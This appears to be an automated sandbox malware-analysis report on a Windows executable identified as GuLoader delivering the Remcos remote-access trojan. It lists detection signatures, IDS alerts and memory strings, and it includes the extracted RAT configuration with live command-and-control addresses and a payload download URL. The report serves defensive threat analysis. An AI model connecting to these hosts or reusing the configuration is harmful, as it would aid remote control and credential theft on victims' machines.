Windows Analysis Report
APPENDIX FORM_N#U00b045013-20241120.com.exe

Overview

General Information

Sample name: APPENDIX FORM_N#U00b045013-20241120.com.exe
(renamed because original name is a hash value)
Original sample name: APPENDIX FORM_N45013-20241120.com.exe
Analysis ID: 1560110
MD5: cf4530628bdb401e066ea81e86403d77
SHA1: b929d4f89e537b8f932bebc75df0959ef9b406ee
SHA256: e721952c765bb39555f2aa9f2141649fe2c1f2700224513c2860c8a7e25d2260
Tags: exe, user-TeamDreier

Detection

Remcos, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
Remcos malware configuration (as extracted by the Malware Configuration Extractor):
{"Host:Port:Password": ["45.133.158.36:11371:1", "45.133.158.36:10051:1", "45.133.158.36:10050:1", "45.133.158.36:24554:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-CDCZ2K", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source | Rule | Description | Author
00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000004.00000003.2163487137.00000000028CE000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
00000000.00000002.1832413744.00000000032D0000.00000040.00001000.00020000.00000000.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security
Process Memory Space: APPENDIX FORM_N#U00b045013-20241120.com.exe PID: 6836 | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security

            Stealing of Sensitive Information

Source: Registry Key set | Author: Joe Security | Data: Details: BC 8C A9 73 7D AF EC 8F 40 5A DB 37 B9 F0 FF 2F 1C 0F C8 E7 D0 5A CC B7 F7 60 E4 30 E1 7F 4B 15 A7 75 A5 0D 0F 6F 58 23 41 BE CA 17 FB 24 10 47 99 01 0A 82 08 60 5F 8E 43 27 C9 9F 35 20 5C 73 C0 7F D2 34 8F E9 8E 47 8A D5 4F 61 1A CE CE CC A6 5D DD 3D 91 CF 90 8F F1 D5 4E 76 EA 8D E9 B9 8E 3C 87 6B AB DC 9D 38 4D 14 D1 1F 9B C8 67 C1 0A ED DC B8 94 9A 20 62 8F E9 80 0C EF B1 AE 18 61 31 FC 86 71 68 EA FF E2 4A 1E 19 02 A2 , EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe, ProcessId: 6836, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-CDCZ2K\exepath
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-21T12:20:18.397173+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49833 | 45.133.158.36 | 11371 | TCP
2024-11-21T12:20:20.709769+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49840 | 45.133.158.36 | 11371 | TCP
2024-11-21T12:20:20.949672+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.7 | 49842 | 178.237.33.50 | 80 | TCP
2024-11-21T12:20:15.335061+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.7 | 49826 | 45.133.158.36 | 80 | TCP

            AV Detection

Source: 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["45.133.158.36:11371:1", "45.133.158.36:10051:1", "45.133.158.36:10050:1", "45.133.158.36:24554:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-CDCZ2K", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
Source: APPENDIX FORM_N#U00b045013-20241120.com.exe | ReversingLabs: Detection: 52%
Source: Yara match | File source: 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.2163487137.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: APPENDIX FORM_N#U00b045013-20241120.com.exe PID: 6836, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 8_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,8_2_00404423
Source: APPENDIX FORM_N#U00b045013-20241120.com.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 0_2_00402647 FindFirstFileA,0_2_00402647
Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 0_2_00405FE4 FindFirstFileA,FindClose,0_2_00405FE4
Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 0_2_004055A0 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004055A0
Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 4_2_00402647 FindFirstFileA,4_2_00402647
Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 4_2_00405FE4 FindFirstFileA,FindClose,4_2_00405FE4
Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 4_2_004055A0 CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,4_2_004055A0
Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 4_2_333E10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_333E10F1
Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 4_2_333E6580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,4_2_333E6580
Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 8_2_0040AE51 FindFirstFileW,FindNextFileW,8_2_0040AE51
Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 9_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,9_2_00407EF8
Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 10_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,10_2_00407898

            Networking

Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49840 -> 45.133.158.36:11371
Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49833 -> 45.133.158.36:11371
Source: Malware configuration extractor | IPs: 45.133.158.36
Source: global traffic | TCP traffic: 192.168.2.7:49833 -> 45.133.158.36:11371
Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
Source: Joe Sandbox View | IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View | ASN Name: AS40676US AS40676US
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.7:49826 -> 45.133.158.36:80
Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49842 -> 178.237.33.50:80
Source: global traffic | HTTP traffic detected: GET /cvTLIRXJzBJoApmtjAY235.bin HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 | Host: 45.133.158.36 | Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 45.133.158.36
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000003.1985053478.0000000000A59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginO/? equals www.facebook.com (Facebook)
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000003.1985053478.0000000000A59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginO/? equals www.yahoo.com (Yahoo)
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2623393052.00000000333B0000.00000040.10000000.00040000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985865973.0000000000A5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ccounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginO/? equals www.facebook.com (Facebook)
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985865973.0000000000A5A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ccounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginO/? equals www.yahoo.com (Yahoo)
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2623139235.00000000332C0000.00000040.10000000.00040000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2623139235.00000000332C0000.00000040.10000000.00040000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2602167733.0000000004490000.00000004.00001000.00020000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.133.158.36/cvTLIRXJzBJoApmtjAY235.bin
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp$
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp-
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp0G
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpA
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpMG
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpN
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpTGu
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp_
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0:
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0H
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://ocsp.digicert.com0I
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://ocsp.msocsp.com0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://ocsp.msocsp.com0S
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://www.digicert.com/CPS0
            Source: bhv2DCB.tmp.8.drString found in binary or memory: http://www.digicert.com/CPS0~
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000003.1969235766.000000000086D000.00000004.00000020.00020000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000003.1969187492.000000000086D000.00000004.00000020.00020000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2623393052.00000000333B0000.00000040.10000000.00040000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000003.1969235766.000000000086D000.00000004.00000020.00020000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000003.1969187492.000000000086D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.comppData
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000004.00000002.2623393052.00000000333B0000.00000040.10000000.00040000.00000000.sdmp, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 00000008.00000002.1985266200.0000000000193000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe | String found in binary or memory: https://login.yahoo.com/config/login
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe, APPENDIX FORM_N#U00b045013-20241120.com.exe, 0000000A.00000002.1970472063.0000000000400000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: https://www.google.com
            Source: APPENDIX FORM_N#U00b045013-20241120.com.exe | String found in binary or memory: https://www.google.com/accounts/servicelogin
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 0_2_00405109 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 8_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 8_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 9_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 9_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 10_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 10_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard

            E-Banking Fraud

            Source: Yara match | File source: 00000004.00000002.2601529101.00000000028C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.2601529101.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000003.2163487137.00000000028CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: APPENDIX FORM_N#U00b045013-20241120.com.exe PID: 6836, type: MEMORYSTR
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Process Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 8_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 8_2_00401806 NtdllDefWindowProc_W
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 8_2_004018C0 NtdllDefWindowProc_W
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 9_2_004016FD NtdllDefWindowProc_A
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 9_2_004017B7 NtdllDefWindowProc_A
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 10_2_00402CAC NtdllDefWindowProc_A
            Source: C:\Users\user\Desktop\APPENDIX FORM_N#U00b045013-20241120.com.exe | Code function: 10_2_00402D66 NtdllDefWindowProc_A
